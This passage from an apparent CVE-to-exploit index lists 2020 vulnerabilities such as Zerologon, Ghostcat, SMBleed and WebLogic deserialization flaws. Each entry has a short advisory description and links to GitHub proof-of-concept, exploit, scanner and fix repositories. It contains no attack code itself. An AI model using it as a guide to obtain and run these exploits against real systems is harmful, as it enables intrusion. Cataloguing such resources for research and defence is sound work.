An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'.
- [cbwang505/CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
- [xyddnljydd/cve-2020-1066](https://github.com/xyddnljydd/cve-2020-1066)
### CVE-2020-1102 (2020-05-21)
A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1024.
- [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129)
### CVE-2020-1206 (2020-06-09)
An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Information Disclosure Vulnerability'.
- [jamf/CVE-2020-1206-POC](https://github.com/jamf/CVE-2020-1206-POC)
- [Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit)
- [Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit)
- [datntsec/CVE-2020-1206](https://github.com/datntsec/CVE-2020-1206)
### CVE-2020-1283 (2020-06-09)
A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'.
- [RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability](https://github.com/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability)
### CVE-2020-1301 (2020-06-09)
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests, aka 'Windows SMB Remote Code Execution Vulnerability'.
- [shubham0d/CVE-2020-1301](https://github.com/shubham0d/CVE-2020-1301)
### CVE-2020-1313 (2020-06-09)
An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations, aka 'Windows Update Orchestrator Service Elevation of Privilege Vulnerability'.
- [irsl/CVE-2020-1313](https://github.com/irsl/CVE-2020-1313)
### CVE-2020-1337 (2020-08-17)
An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted script or application.\nThe update addresses the vulnerability by correcting how the Windows Print Spooler Component writes to the file system.\n
- [math1as/CVE-2020-1337-exploit](https://github.com/math1as/CVE-2020-1337-exploit)
- [VoidSec/CVE-2020-1337](https://github.com/VoidSec/CVE-2020-1337)
- [neofito/CVE-2020-1337](https://github.com/neofito/CVE-2020-1337)
- [sailay1996/cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc)
- [ZTK-009/cve-2020-1337-poc](https://github.com/ZTK-009/cve-2020-1337-poc)
### CVE-2020-1349 (2020-07-14)
A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'.
- [0neb1n/CVE-2020-1349](https://github.com/0neb1n/CVE-2020-1349)
### CVE-2020-1350 (2020-07-14)
A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests, aka 'Windows DNS Server Remote Code Execution Vulnerability'.
- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts)
- [ZephrFish/CVE-2020-1350_HoneyPoC](https://github.com/ZephrFish/CVE-2020-1350_HoneyPoC)
- [mr-r3b00t/CVE-2020-1350](https://github.com/mr-r3b00t/CVE-2020-1350)
- [zoomerxsec/Fake_CVE-2020-1350](https://github.com/zoomerxsec/Fake_CVE-2020-1350)
- [T13nn3s/CVE-2020-1350](https://github.com/T13nn3s/CVE-2020-1350)
- [corelight/SIGRed](https://github.com/corelight/SIGRed)
- [jmaddington/dRMM-CVE-2020-1350-response](https://github.com/jmaddington/dRMM-CVE-2020-1350-response)
- [maxpl0it/CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS)
- [captainGeech42/CVE-2020-1350](https://github.com/captainGeech42/CVE-2020-1350)
- [connormcgarr/CVE-2020-1350](https://github.com/connormcgarr/CVE-2020-1350)
- [graph-inc/CVE-2020-1350](https://github.com/graph-inc/CVE-2020-1350)
- [CVEmaster/CVE-2020-1350](https://github.com/CVEmaster/CVE-2020-1350)
- [gdwnet/cve-2020-1350](https://github.com/gdwnet/cve-2020-1350)
- [simeononsecurity/CVE-2020-1350-Fix](https://github.com/simeononsecurity/CVE-2020-1350-Fix)
### CVE-2020-1362 (2020-07-14)
An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1344, CVE-2020-1369.
- [Q4n/CVE-2020-1362](https://github.com/Q4n/CVE-2020-1362)
### CVE-2020-1472 (2020-08-17)
An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.\nTo exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access.\nMicrosoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels.\nFor guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020).\nWhen the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.\n
- [Tobey123/CVE-2020-1472-visualizer](https://github.com/Tobey123/CVE-2020-1472-visualizer)
- [SecuraBV/CVE-2020-1472](https://github.com/SecuraBV/CVE-2020-1472)
- [cube0x0/CVE-2020-1472](https://github.com/cube0x0/CVE-2020-1472)
- [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
- [VoidSec/CVE-2020-1472](https://github.com/VoidSec/CVE-2020-1472)
- [risksense/zerologon](https://github.com/risksense/zerologon)
- [bb00/zer0dump](https://github.com/bb00/zer0dump)
- [0xkami/CVE-2020-1472](https://github.com/0xkami/CVE-2020-1472)
- [NAXG/CVE-2020-1472](https://github.com/NAXG/CVE-2020-1472)
- [thatonesecguy/zerologon-CVE-2020-1472](https://github.com/thatonesecguy/zerologon-CVE-2020-1472)
- [k8gege/CVE-2020-1472-EXP](https://github.com/k8gege/CVE-2020-1472-EXP)
- [jiushill/CVE-2020-1472](https://github.com/jiushill/CVE-2020-1472)
- [McKinnonIT/zabbix-template-CVE-2020-1472](https://github.com/McKinnonIT/zabbix-template-CVE-2020-1472)
- [mstxq17/cve-2020-1472](https://github.com/mstxq17/cve-2020-1472)
- [Fa1c0n35/CVE-2020-1472](https://github.com/Fa1c0n35/CVE-2020-1472)
- [Fa1c0n35/SecuraBV-CVE-2020-1472](https://github.com/Fa1c0n35/SecuraBV-CVE-2020-1472)
- [CanciuCostin/CVE-2020-1472](https://github.com/CanciuCostin/CVE-2020-1472)
- [0xcccc666/cve-2020-1472_Tool-collection](https://github.com/0xcccc666/cve-2020-1472_Tool-collection)
- [murataydemir/CVE-2020-1472](https://github.com/murataydemir/CVE-2020-1472)
- [npocmak/CVE-2020-1472](https://github.com/npocmak/CVE-2020-1472)
- [victim10wq3/CVE-2020-1472](https://github.com/victim10wq3/CVE-2020-1472)
- [zeronetworks/zerologon](https://github.com/zeronetworks/zerologon)
- [sv3nbeast/CVE-2020-1472](https://github.com/sv3nbeast/CVE-2020-1472)
- [midpipps/CVE-2020-1472-Easy](https://github.com/midpipps/CVE-2020-1472-Easy)
- [hectorgie/CVE-2020-1472](https://github.com/hectorgie/CVE-2020-1472)
- [johnpathe/zerologon-cve-2020-1472-notes](https://github.com/johnpathe/zerologon-cve-2020-1472-notes)
- [t31m0/CVE-2020-1472](https://github.com/t31m0/CVE-2020-1472)
- [grupooruss/CVE-2020-1472](https://github.com/grupooruss/CVE-2020-1472)
- [striveben/CVE-2020-1472](https://github.com/striveben/CVE-2020-1472)
- [Fa1c0n35/CVE-2020-1472-02-](https://github.com/Fa1c0n35/CVE-2020-1472-02-)
- [Whippet0/CVE-2020-1472](https://github.com/Whippet0/CVE-2020-1472)
- [WiIs0n/Zerologon_CVE-2020-1472](https://github.com/WiIs0n/Zerologon_CVE-2020-1472)
- [Privia-Security/ADZero](https://github.com/Privia-Security/ADZero)
- [Ken-Abruzzi/cve-2020-1472](https://github.com/Ken-Abruzzi/cve-2020-1472)
- [rhymeswithmogul/Set-ZerologonMitigation](https://github.com/rhymeswithmogul/Set-ZerologonMitigation)
- [shanfenglan/cve-2020-1472](https://github.com/shanfenglan/cve-2020-1472)
- [maikelnight/zerologon](https://github.com/maikelnight/zerologon)
- [CPO-EH/CVE-2020-1472_ZeroLogonChecker](https://github.com/CPO-EH/CVE-2020-1472_ZeroLogonChecker)
- [puckiestyle/CVE-2020-1472](https://github.com/puckiestyle/CVE-2020-1472)
- [mingchen-script/CVE-2020-1472-visualizer](https://github.com/mingchen-script/CVE-2020-1472-visualizer)
- [JayP232/The_big_Zero](https://github.com/JayP232/The_big_Zero)
- [b1ack0wl/CVE-2020-1472](https://github.com/b1ack0wl/CVE-2020-1472)
- [SaharAttackit/CVE-2020-1472](https://github.com/SaharAttackit/CVE-2020-1472)
- [wrathfulDiety/zerologon](https://github.com/wrathfulDiety/zerologon)
- [YossiSassi/ZeroLogon-Exploitation-Check](https://github.com/YossiSassi/ZeroLogon-Exploitation-Check)
- [sho-luv/zerologon](https://github.com/sho-luv/zerologon)
- [hell-moon/ZeroLogon-Exploit](https://github.com/hell-moon/ZeroLogon-Exploit)
- [Udyz/Zerologon](https://github.com/Udyz/Zerologon)
- [itssmikefm/CVE-2020-1472](https://github.com/itssmikefm/CVE-2020-1472)
- [B34MR/zeroscan](https://github.com/B34MR/zeroscan)
- [TheJoyOfHacking/SecuraBV-CVE-2020-1472](https://github.com/TheJoyOfHacking/SecuraBV-CVE-2020-1472)
- [TheJoyOfHacking/dirkjanm-CVE-2020-1472](https://github.com/TheJoyOfHacking/dirkjanm-CVE-2020-1472)
- [Anonymous-Family/Zero-day-scanning](https://github.com/Anonymous-Family/Zero-day-scanning)
- [Anonymous-Family/CVE-2020-1472](https://github.com/Anonymous-Family/CVE-2020-1472)
- [carlos55ml/zerologon](https://github.com/carlos55ml/zerologon)
- [Rvn0xsy/ZeroLogon](https://github.com/Rvn0xsy/ZeroLogon)
- [guglia001/MassZeroLogon](https://github.com/guglia001/MassZeroLogon)
- [likeww/MassZeroLogon](https://github.com/likeww/MassZeroLogon)
- [dr4g0n23/CVE-2020-1472](https://github.com/dr4g0n23/CVE-2020-1472)
- [RicYaben/CVE-2020-1472-LAB](https://github.com/RicYaben/CVE-2020-1472-LAB)
- [Akash7350/CVE-2020-1472](https://github.com/Akash7350/CVE-2020-1472)
- [c3rrberu5/ZeroLogon-to-Shell](https://github.com/c3rrberu5/ZeroLogon-to-Shell)
- [logg-1/0logon](https://github.com/logg-1/0logon)
- [whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC](https://github.com/whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC)
- [JolynNgSC/Zerologon_CVE-2020-1472](https://github.com/JolynNgSC/Zerologon_CVE-2020-1472)
- [blackh00d/zerologon-poc](https://github.com/blackh00d/zerologon-poc)
### CVE-2020-1493 (2020-08-17)
An information disclosure vulnerability exists when attaching files to Outlook messages. This vulnerability could potentially allow users to share attached files such that they are accessible by anonymous users where they should be restricted to specific users.\nTo exploit this vulnerability, an attacker would have to attach a file as a link to an email. The email could then be shared with individuals that should not have access to the files, ignoring the default organizational setting.\nThe security update addresses the vulnerability by correcting how Outlook handles file attachment links.\n
- [0neb1n/CVE-2020-1493](https://github.com/0neb1n/CVE-2020-1493)
### CVE-2020-1611 (2020-01-15)
A Local File Inclusion vulnerability in Juniper Networks Junos Space allows an attacker to view all files on the target when the device receives malicious HTTP packets. This issue affects: Juniper Networks Junos Space versions prior to 19.4R1.
- [Ibonok/CVE-2020-1611](https://github.com/Ibonok/CVE-2020-1611)
### CVE-2020-1764 (2020-03-26)
A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
- [jpts/cve-2020-1764-poc](https://github.com/jpts/cve-2020-1764-poc)
### CVE-2020-1937 (2020-02-24)
Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.
- [shanika04/apache_kylin](https://github.com/shanika04/apache_kylin)
### CVE-2020-1938 (2020-02-24)
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
- [xindongzhuaizhuai/CVE-2020-1938](https://github.com/xindongzhuaizhuai/CVE-2020-1938)
- [sgdream/CVE-2020-1938](https://github.com/sgdream/CVE-2020-1938)
- [nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)
- [bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner](https://github.com/bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner)
- [laolisafe/CVE-2020-1938](https://github.com/laolisafe/CVE-2020-1938)
- [h7hac9/CVE-2020-1938](https://github.com/h7hac9/CVE-2020-1938)
- [sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read](https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read)
- [fairyming/CVE-2020-1938](https://github.com/fairyming/CVE-2020-1938)
- [dacade/CVE-2020-1938](https://github.com/dacade/CVE-2020-1938)
- [woaiqiukui/CVE-2020-1938TomcatAjpScanner](https://github.com/woaiqiukui/CVE-2020-1938TomcatAjpScanner)
- [fatal0/tomcat-cve-2020-1938-check](https://github.com/fatal0/tomcat-cve-2020-1938-check)
- [delsadan/CNVD-2020-10487-Bulk-verification](https://github.com/delsadan/CNVD-2020-10487-Bulk-verification)
- [00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487)
- [shaunmclernon/ghostcat-verification](https://github.com/shaunmclernon/ghostcat-verification)
- [w4fz5uck5/CVE-2020-1938-Clean-Version](https://github.com/w4fz5uck5/CVE-2020-1938-Clean-Version)
- [whatboxapp/GhostCat-LFI-exp](https://github.com/whatboxapp/GhostCat-LFI-exp)
- [Just1ceP4rtn3r/CVE-2020-1938-Tool](https://github.com/Just1ceP4rtn3r/CVE-2020-1938-Tool)
- [doggycheng/CNVD-2020-10487](https://github.com/doggycheng/CNVD-2020-10487)
- [I-Runtime-Error/CVE-2020-1938](https://github.com/I-Runtime-Error/CVE-2020-1938)
- [Umesh2807/Ghostcat](https://github.com/Umesh2807/Ghostcat)
- [MateoSec/ghostcatch](https://github.com/MateoSec/ghostcatch)
- [acodervic/CVE-2020-1938-MSF-MODULE](https://github.com/acodervic/CVE-2020-1938-MSF-MODULE)
- [Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat](https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat)
- [streghstreek/CVE-2020-1938](https://github.com/streghstreek/CVE-2020-1938)
- [Neko-chanQwQ/CVE-2020-1938](https://github.com/Neko-chanQwQ/CVE-2020-1938)
- [jptr218/ghostcat](https://github.com/jptr218/ghostcat)
- [einzbernnn/CVE-2020-1938Scan](https://github.com/einzbernnn/CVE-2020-1938Scan)
- [YounesTasra-R4z3rSw0rd/CVE-2020-1938](https://github.com/YounesTasra-R4z3rSw0rd/CVE-2020-1938)
- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat)
- [Warelock/cve-2020-1938](https://github.com/Warelock/cve-2020-1938)
- [lizhianyuguangming/TomcatScanPro](https://github.com/lizhianyuguangming/TomcatScanPro)
### CVE-2020-1947 (2020-03-11)
In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE.
- [jas502n/CVE-2020-1947](https://github.com/jas502n/CVE-2020-1947)
- [wsfengfan/CVE-2020-1947](https://github.com/wsfengfan/CVE-2020-1947)
- [shadowsock5/ShardingSphere_CVE-2020-1947](https://github.com/shadowsock5/ShardingSphere_CVE-2020-1947)
- [StarkChristmas/CVE-2020-1947](https://github.com/StarkChristmas/CVE-2020-1947)
### CVE-2020-1948 (2020-07-14)
This vulnerability can affect all Dubbo users stay on version 2.7.6 or lower. An attacker can send RPC requests with unrecognized service name or method name along with some malicious parameter payloads. When the malicious parameter is deserialized, it will execute some malicious code. More details can be found below.
- [ctlyz123/CVE-2020-1948](https://github.com/ctlyz123/CVE-2020-1948)
- [txrw/Dubbo-CVE-2020-1948](https://github.com/txrw/Dubbo-CVE-2020-1948)
- [M3g4Byt3/cve-2020-1948-poc](https://github.com/M3g4Byt3/cve-2020-1948-poc)
- [L0kiii/Dubbo-deserialization](https://github.com/L0kiii/Dubbo-deserialization)
### CVE-2020-1956 (2020-05-22)
Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.
- [b510/CVE-2020-1956](https://github.com/b510/CVE-2020-1956)
### CVE-2020-1958 (2020-04-01)
When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.
- [ggolawski/CVE-2020-1958](https://github.com/ggolawski/CVE-2020-1958)
### CVE-2020-1967 (2020-04-21)
Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occurs if an invalid or unrecognised signature algorithm is received from the peer. This could be exploited by a malicious peer in a Denial of Service attack. OpenSSL version 1.1.1d, 1.1.1e, and 1.1.1f are affected by this issue. This issue did not affect OpenSSL versions prior to 1.1.1d. Fixed in OpenSSL 1.1.1g (Affected 1.1.1d-1.1.1f).
- [irsl/CVE-2020-1967](https://github.com/irsl/CVE-2020-1967)
### CVE-2020-1971 (2020-12-08)
The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).
- [MBHudson/CVE-2020-1971](https://github.com/MBHudson/CVE-2020-1971)
### CVE-2020-2023 (2020-06-10)
Kata Containers doesn't restrict containers from accessing the guest's root filesystem device. Malicious containers can exploit this to gain code execution on the guest and masquerade as the kata-agent. This issue affects Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; and Kata Containers 1.9 and earlier versions.
- [ssst0n3/kata-cve-2020-2023-poc](https://github.com/ssst0n3/kata-cve-2020-2023-poc)
### CVE-2020-2034 (2020-07-08)
An OS Command Injection vulnerability in the PAN-OS GlobalProtect portal allows an unauthenticated network based attacker to execute arbitrary OS commands with root privileges. An attacker requires some knowledge of the firewall to exploit this issue. This issue can not be exploited if GlobalProtect portal feature is not enabled. This issue impacts PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; all versions of PAN-OS 8.0 and PAN-OS 7.1. Prisma Access services are not impacted by this vulnerability.
- [blackhatethicalhacking/CVE-2020-2034-POC](https://github.com/blackhatethicalhacking/CVE-2020-2034-POC)
### CVE-2020-2038 (2020-09-09)
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.
- [und3sc0n0c1d0/CVE-2020-2038](https://github.com/und3sc0n0c1d0/CVE-2020-2038)
### CVE-2020-2333
- [section-c/CVE-2020-2333](https://github.com/section-c/CVE-2020-2333)
### CVE-2020-2501 (2021-02-17)
A stack-based buffer overflow vulnerability has been reported to affect QNAP NAS devices running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. QNAP have already fixed this vulnerability in the following versions: Surveillance Station 5.1.5.4.3 (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS) Surveillance Station 5.1.5.3.3 (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS)
- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)
### CVE-2020-2509 (2021-04-17)
A command injection vulnerability has been reported to affect QTS and QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. We have already fixed this vulnerability in the following versions: QTS 4.5.2.1566 Build 20210202 and later QTS 4.5.1.1495 Build 20201123 and later QTS 4.3.6.1620 Build 20210322 and later QTS 4.3.4.1632 Build 20210324 and later QTS 4.3.3.1624 Build 20210416 and later QTS 4.2.6 Build 20210327 and later QuTS hero h4.5.1.1491 build 20201119 and later
- [jbaines-r7/overkill](https://github.com/jbaines-r7/overkill)
### CVE-2020-2546 (2020-01-15)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Application Container - JavaEE). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [hktalent/CVE_2020_2546](https://github.com/hktalent/CVE_2020_2546)
### CVE-2020-2551 (2020-01-15)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [jas502n/CVE-2020-2551](https://github.com/jas502n/CVE-2020-2551)
- [hktalent/CVE-2020-2551](https://github.com/hktalent/CVE-2020-2551)
- [Y4er/CVE-2020-2551](https://github.com/Y4er/CVE-2020-2551)
- [zzwlpx/weblogicPoc](https://github.com/zzwlpx/weblogicPoc)
- [Dido1960/Weblogic-CVE-2020-2551-To-Internet](https://github.com/Dido1960/Weblogic-CVE-2020-2551-To-Internet)
- [DaMinGshidashi/CVE-2020-2551](https://github.com/DaMinGshidashi/CVE-2020-2551)
- [LTiDi2000/CVE-2020-2551](https://github.com/LTiDi2000/CVE-2020-2551)
- [0xAbbarhSF/CVE-Exploit](https://github.com/0xAbbarhSF/CVE-Exploit)
### CVE-2020-2555 (2020-01-15)
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [Hu3sky/CVE-2020-2555](https://github.com/Hu3sky/CVE-2020-2555)
- [wsfengfan/CVE-2020-2555](https://github.com/wsfengfan/CVE-2020-2555)
- [Y4er/CVE-2020-2555](https://github.com/Y4er/CVE-2020-2555)
- [Maskhe/cve-2020-2555](https://github.com/Maskhe/cve-2020-2555)
- [Uvemode/CVE-2020-2555](https://github.com/Uvemode/CVE-2020-2555)
- [Qynklee/POC_CVE-2020-2555](https://github.com/Qynklee/POC_CVE-2020-2555)
### CVE-2020-2655 (2020-01-15)
Vulnerability in the Java SE product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
- [RUB-NDS/CVE-2020-2655-DemoServer](https://github.com/RUB-NDS/CVE-2020-2655-DemoServer)
### CVE-2020-2733 (2020-04-15)
Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [anmolksachan/CVE-2020-2733](https://github.com/anmolksachan/CVE-2020-2733)
### CVE-2020-2883 (2020-04-15)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [Y4er/CVE-2020-2883](https://github.com/Y4er/CVE-2020-2883)
- [MagicZer0/Weblogic_CVE-2020-2883_POC](https://github.com/MagicZer0/Weblogic_CVE-2020-2883_POC)
- [ZZZWD/CVE-2020-2883](https://github.com/ZZZWD/CVE-2020-2883)
- [Y4er/WebLogic-Shiro-shell](https://github.com/Y4er/WebLogic-Shiro-shell)
